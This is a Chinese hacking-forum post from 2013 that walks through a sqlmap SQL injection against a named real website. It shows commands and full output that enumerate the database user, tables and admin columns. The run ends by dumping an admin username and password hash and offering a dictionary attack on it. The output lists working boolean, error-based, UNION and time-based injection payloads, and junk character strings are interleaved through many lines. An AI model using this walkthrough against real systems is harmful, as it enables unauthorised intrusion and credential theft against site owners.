找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2445|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! u7 Q# W7 t) O: O# i
ms "Mysql" --current-user       /*  注解:获取当前用户名称
$ F. l9 O5 N8 T  y9 n! h: q    sqlmap/0.9 - automatic SQL injection and database takeover tool4 o$ j8 f; c- u  l. i3 B! ~
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    + s/ b. j4 r, j* }* _[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 V# W5 m% c! ?" u6 @& Z
    session file
    0 I. Q4 F+ ], h) @[16:53:54] [INFO] resuming injection data from session file2 p4 V1 y0 k" ~
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 \/ Y+ {2 _, e( z3 t: _' g+ E
    [16:53:54] [INFO] testing connection to the target url
    # o8 _) D& b1 X  gsqlmap identified the following injection points with a total of 0 HTTP(s) reque6 J/ R' l9 B1 [6 D
    sts:: }# x, y4 \0 P/ V! T
    ---& F# f' g* Q/ p7 j# ~/ H! k. Q5 i
    Place: GET) S3 H8 `/ u2 g. w$ g# j& i, |
    Parameter: id
    : \& w6 [+ s5 {) P' d+ {* h( h    Type: boolean-based blind
    ( u! A8 t. M* W    Title: AND boolean-based blind - WHERE or HAVING clause- r9 ]" j% d  ~6 G9 V4 j% ~
        Payload: id=276 AND 799=799
    ; I1 i0 {( v# |/ P' @* f: k5 Q    Type: error-based  |- z8 e- c) O4 |/ n
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( b- M  S* b, J2 ?" ?8 f/ ~    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    / Z) l+ w$ q4 I$ {1 h' z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
      `- I. l+ c. C8 A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 e" M4 L! k" J  ]
        Type: UNION query
    * Z) {# V# m" [+ }  a) b; X$ z" ~    Title: MySQL UNION query (NULL) - 1 to 10 columns9 E& n: N! }# {% g4 k  L2 ?/ {8 Y! J
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 _; G3 t/ R+ ~5 E- _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * n* l, B" V' y  O5 d) ^* }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    : ^6 ~1 j9 Q& d7 T& {( H* R    Type: AND/OR time-based blind  W9 ~) q+ [5 N2 Z. v0 P' J/ ]8 ?, u
        Title: MySQL > 5.0.11 AND time-based blind
    . A' K4 |' U& }. B1 d4 W% i9 J    Payload: id=276 AND SLEEP(5)
    7 s- {* Y6 @9 o) z0 g---
    * y& n! j- I0 V: r& K, p1 y7 Q[16:53:55] [INFO] the back-end DBMS is MySQL. U0 [) k9 D/ ~3 ]3 b: D
    web server operating system: Windows2 e" L1 M$ L0 j  W
    web application technology: Apache 2.2.11, PHP 5.3.0
    . m1 n: s/ \6 Z% |" F  v- A! _3 b9 Lback-end DBMS: MySQL 5.0
    5 d5 ~! v' p( w$ e- p$ T[16:53:55] [INFO] fetching current user
    ' w3 k( v, Q. c: h. h; I8 Lcurrent user:    'root@localhost'   1 n1 b$ P; q% q! Q- g1 P. y
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    7 a8 ?3 \' i- h8 Q  d+ Ytput\www.wepost.com.hk'
  • shutting down at: 16:53:58' W' r/ y6 |+ [+ T9 s
    6 `3 S' }  A. ]  ?/ u4 B- J
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    . H- s5 M, ]5 s* mms "Mysql" --current-db                  /*当前数据库9 t. Z) w" p. u4 v+ w: `
        sqlmap/0.9 - automatic SQL injection and database takeover tool3 j, d+ Q0 b$ B: E3 j0 W
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    * X; d0 Z  e5 Z) d& f) D% b% M! i[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 T4 m7 V9 }+ w
    session file7 H/ M# i+ o0 s1 m8 C# L: E& ]
    [16:54:16] [INFO] resuming injection data from session file
    ! F. q7 m! c9 S# O4 n: j+ s+ g' Y[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: ]* }+ \% T1 r1 H( c/ n
    [16:54:16] [INFO] testing connection to the target url
    & \) b* {) E$ N5 a2 I* |sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 V! c, r0 f# p- v& R* m
    sts:! |5 v0 Z+ G& [0 p
    ---
    / T5 S2 H3 [# \# n" V$ ePlace: GET5 q  m) u1 i/ N
    Parameter: id8 q& P9 x* V  G; e; V8 ^
        Type: boolean-based blind
    8 X% k% I* \& y/ b    Title: AND boolean-based blind - WHERE or HAVING clause
    & @) a& A, C: {& R    Payload: id=276 AND 799=799
      u$ l/ e8 X! ^+ a2 q! y, k* u- I    Type: error-based% U: R3 s/ g" g) s* k( ~7 u
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    0 s4 {; q. j+ i- V( E) D    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    $ e, S9 m$ t/ @0 W2 Q$ a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 L9 K; f7 ~% ?6 V3 Y$ G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! x; q7 W- e& B$ P4 @7 X    Type: UNION query  @+ k( v6 n& J  R& H) `
        Title: MySQL UNION query (NULL) - 1 to 10 columns; f& P2 P: v& m, G/ N3 g/ S
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! l+ u" u) d0 F4 c# ^; f, a1 l
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ) c5 a( \3 X. E7 `5 q7 @CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    3 U- a" |- r$ U1 x    Type: AND/OR time-based blind
    , p6 E0 v( g: n4 |; ]4 s3 ~    Title: MySQL > 5.0.11 AND time-based blind+ D& n3 t( J9 @( Y$ }& _
        Payload: id=276 AND SLEEP(5)
    * k. J* i' @* M. Q" ^---8 i$ }. e/ v# V+ q: V/ V, |
    [16:54:17] [INFO] the back-end DBMS is MySQL
    ! }, o2 ]" g  O7 b) z  a9 @web server operating system: Windows
    5 a1 O. H/ |; I3 `' R( l; e+ `6 fweb application technology: Apache 2.2.11, PHP 5.3.0. S8 w; n6 F$ Q: C9 b% @
    back-end DBMS: MySQL 5.0* `+ I- N6 S+ x+ W6 H
    [16:54:17] [INFO] fetching current database
    6 C% n, o7 q8 M4 C7 I+ O5 vcurrent database:    'wepost'. G( H3 p9 P- P0 z6 N
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& m% {) @$ C. ]; y  k
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18  c5 @# g  [' s, I0 o
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
      t9 ?# p6 A' yms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    9 d1 a4 _2 r( e0 Q7 H0 G7 [    sqlmap/0.9 - automatic SQL injection and database takeover tool6 Q. z* r" ^5 Z6 b+ L. a8 g5 s+ w
        http://sqlmap.sourceforge.net
  • starting at: 16:55:254 _1 |$ _" w  N% ]$ W
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    * A; C* t3 `; G2 t6 m session file. W/ i5 I; E( T2 b- A
    [16:55:25] [INFO] resuming injection data from session file
    * q  p+ ?/ ^( c) Z[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ @) Q% ^6 m: m# J: E1 U
    [16:55:25] [INFO] testing connection to the target url
    * Q. D& ]4 E7 W& ?  n: I) W# ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque, J; f9 p) n+ D! y2 |# K$ Z& z/ Q
    sts:1 ~1 C9 e$ ?0 {3 [; e6 s
    ---
      h6 Z" y( S- \0 IPlace: GET& N* _( U( G( H  d
    Parameter: id
    5 A! l0 D9 j8 {1 U: U) h: p    Type: boolean-based blind
    # E3 U5 R; m' _4 b- z+ U    Title: AND boolean-based blind - WHERE or HAVING clause5 m" T/ ^! J" e/ w/ y0 j& V2 w) m
        Payload: id=276 AND 799=799
    6 X/ Y) o* F$ H+ a; A5 m$ K; I    Type: error-based% `& ?8 D) ~. X# `3 c! q7 r
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    0 [* {7 u4 I3 B- ~& f6 T( v1 T; p2 R/ y% Q" v    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    + M7 v- D1 z: A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # y% x# g. N  c8 P! g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    + X/ X+ U/ u2 {( W    Type: UNION query
    3 Q- F( Y" @8 B    Title: MySQL UNION query (NULL) - 1 to 10 columns- m+ }- z- i. d! J; r
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! S- J3 @" t9 }* t2 u% p& k7 @
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! K9 s. }! J4 R! e
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' G0 d* K- z3 T% l    Type: AND/OR time-based blind
    8 C2 D$ t3 J/ ]  f+ x* f* O    Title: MySQL > 5.0.11 AND time-based blind9 w" G) f$ K5 O1 V7 i  X
        Payload: id=276 AND SLEEP(5)' m, s, Z* c: ^. j4 h
    ---
    6 V8 E/ p; `, z; Q! S& m' O[16:55:26] [INFO] the back-end DBMS is MySQL# h7 Q' B$ v0 Q2 o; ~# H% T
    web server operating system: Windows
    & C1 u' W6 s6 L( ^8 o9 \/ Iweb application technology: Apache 2.2.11, PHP 5.3.0
    + v1 b, z) {% J$ a0 w* E( L: {2 t) Oback-end DBMS: MySQL 5.06 \8 E5 M9 R* q, c1 ^
    [16:55:26] [INFO] fetching tables for database 'wepost'
    * \$ {4 {1 T' Y% H, V[16:55:27] [INFO] the SQL query used returns 6 entries) y2 a6 j6 b6 W  p' N
    Database: wepost5 D* b# Z; j+ o( s2 m
    [6 tables]
    5 p6 ]' J1 R9 Q0 Y* M$ w+-------------+- {$ V! {+ w3 z- f9 B/ o1 c
    | admin       |7 e( }1 b; }" t. d7 `, `- ~
    | article     |- Q4 L" F: I$ s  V) B+ c
    | contributor |
    6 u6 E& \! F9 d1 q- a1 g: x1 L| idea        |  \+ E' _0 w5 B0 ?' }- w0 h
    | image       |4 M7 @# I. j& v, B: K/ ^" e3 _
    | issue       |  a1 o; ?, T. L3 H$ m4 s
    +-------------+
    2 u9 B7 {  p/ I[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    1 D" V- [# v8 |6 X/ z/ ]! m' Y- _tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    1 [% m5 o) z2 k. Y
    & x- |& ^  s! [. [1 a* AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 m; h' K0 M4 l+ n, F+ s
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名  q. g( R2 r: p2 z# ]! `% S
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    " ]: ?3 N8 Q& k  Q0 a    http://sqlmap.sourceforge.net
  • starting at: 16:56:068 k: }5 s" w3 _, e- d( r: z
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    # |  q1 C) ~, bsts:4 `; O* B& F- x: R* H& |
    ---
    ' a. a" W3 h- q1 d8 RPlace: GET
    $ s+ N! J5 Z" t" ?Parameter: id* E6 E& v# ]  c% q( }
        Type: boolean-based blind
    * L. x& o' i# j) P5 y% ?! k' ~    Title: AND boolean-based blind - WHERE or HAVING clause
    8 j' d; {6 G, ~) T& w    Payload: id=276 AND 799=799
    # @/ J( ~  h" q1 [  U  O0 k    Type: error-based
    ' ~, n/ G8 ]1 W" D9 O% u    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    : P& K- g1 d+ v, z    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    & P% p( Z. w2 M6 P+ D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ I, a1 X& f- [
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    + ]. |" D) U* V9 S# g    Type: UNION query4 b) p4 u0 u) Z
        Title: MySQL UNION query (NULL) - 1 to 10 columns7 ~4 z2 K4 y3 b- k
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ `: X" t! i( p- k, D. ?" S& R
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; W  p; Q0 K% {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 n7 ^2 J; M" F% B' T2 N
        Type: AND/OR time-based blind
    8 z$ ?" m7 O! ^! q; C    Title: MySQL > 5.0.11 AND time-based blind
    5 s0 Y/ T; w! @  u, D- Z    Payload: id=276 AND SLEEP(5)
    " s( G- a% d* {! E8 h2 ]# c---2 E. U. d7 _9 @7 c; A/ W/ |
    web server operating system: Windows& u% [' y! e2 c8 v
    web application technology: Apache 2.2.11, PHP 5.3.0
    0 u$ L% t' V$ d. {back-end DBMS: MySQL 5.0
    ; a1 ]* j6 w  T[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    1 X: f1 E7 A( r, J* X; }: I9 F4 C3 ]9 E4 Zssion': wepost, wepost
    * h; @8 U$ f+ v/ Y+ FDatabase: wepost1 w/ \- E. g9 M) n9 |  G
    Table: admin( h& M" s, s( b( H4 O5 U$ c+ t; p
    [4 columns]5 U! z, B' `: \" t9 i2 b* g1 J
    +----------+-------------+$ C7 T  ^1 y3 c) @2 ~/ K, f
    | Column   | Type        |. D- j; B: V4 V1 S, b# ]
    +----------+-------------+
    : t, ~; n% l' e4 e- q' k: Y| id       | int(11)     |
    ' ?. f) d: I, ]' ~* l# D  O% D| password | varchar(32) |
    , ^4 k& d/ g! ]( b/ Y1 H+ f| type     | varchar(10) |
    - C. y+ X0 a/ v+ F" u| userid   | varchar(20) |
    . R  p7 S, m3 Z" W. x8 O/ Y/ Y' B+----------+-------------+
    + P! m7 D5 g: Y1 B2 Z
  • shutting down at: 16:56:19# s+ Z+ s+ `2 o, b

    9 w2 F9 \/ Y8 j5 C6 ^; F  VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    / B0 R9 W+ I1 o% C, {, `ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    * y; y" \3 v0 e1 _$ {4 k    sqlmap/0.9 - automatic SQL injection and database takeover tool- V/ F/ S3 ^0 s$ H& s
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    0 I1 C, V1 S6 g1 o/ x" y. q9 g. Msqlmap identified the following injection points with a total of 0 HTTP(s) reque( A  S3 n- d8 d" @) K) Y, |! J2 d
    sts:7 R1 n  u& D- S
    ---( m! E$ ~" m: X; K8 X
    Place: GET
    + C' ]6 Z" U2 [' |Parameter: id- k# w9 x% z/ c) l$ F* w
        Type: boolean-based blind
    7 O/ y6 f' S: Y  k5 C6 _    Title: AND boolean-based blind - WHERE or HAVING clause, w$ n1 I: e4 q# _, T8 s3 @0 w+ r
        Payload: id=276 AND 799=799
    , c/ l6 i$ ?# d, E+ ^! b" [! E! f    Type: error-based1 a; W3 |9 W& @
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    $ N4 `& _2 s! T4 e6 {" x0 S    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ! ~% B7 q* G1 f5 F120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 q) {8 u, c6 s) K& W( J' m: X
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ h* Q3 w# d; }$ _; P: e
        Type: UNION query
    + j' _0 i/ i8 S* X. S9 X+ x  d* [4 ?    Title: MySQL UNION query (NULL) - 1 to 10 columns
    & o  G* N. j( Y! V  C- A, d    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ) S5 W, {8 f# J  B* y% A4 z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; `. T0 Y1 ], m8 d& K7 i
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    , r8 ~- S0 t. e" F6 t; M* ^. `    Type: AND/OR time-based blind
    " f& V( l+ G# U    Title: MySQL > 5.0.11 AND time-based blind$ c! a5 k8 g0 i, P
        Payload: id=276 AND SLEEP(5)
    - w9 S5 W2 J& ?$ N; B2 b---
    & V" h! `2 w1 C. B2 Bweb server operating system: Windows
    % b) I* ~/ E/ D+ P5 z) j* W4 c5 }& Rweb application technology: Apache 2.2.11, PHP 5.3.0+ E! i2 R9 N% G/ r; h9 m& C
    back-end DBMS: MySQL 5.0
    0 |9 A/ ]/ W) ?recognized possible password hash values. do you want to use dictionary attack o
    3 \% l) x& g3 J3 i% ^n retrieved table items? [Y/n/q] y
    : {$ x2 O5 D* ?% g1 f2 W7 ~what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    3 }3 }9 f8 e% I3 s5 V( |8 }do you want to use common password suffixes? (slow!) [y/N] y9 y- n) k7 V& o6 F+ r0 U$ w
    Database: wepost
    ( ?9 `: M! Y( JTable: admin
    # Q0 A. L( o5 o5 ]$ d/ @[1 entry]5 `4 }$ O) m& [. C2 l& H
    +----------------------------------+------------+
    % ~$ e4 d6 }- O| password                         | userid     |6 W" O- Y7 u! Q* H
    +----------------------------------+------------+
    5 ^! h/ l3 z# o9 }| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |) B; b" P0 ?' [
    +----------------------------------+------------+
    - g9 R$ u$ ?$ g- U" W& Q6 y+ o9 C
  • shutting down at: 16:58:14
    , H* S$ D9 V- \" p/ P
    5 f+ u4 x0 |+ r$ I, X. T, w9 aD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表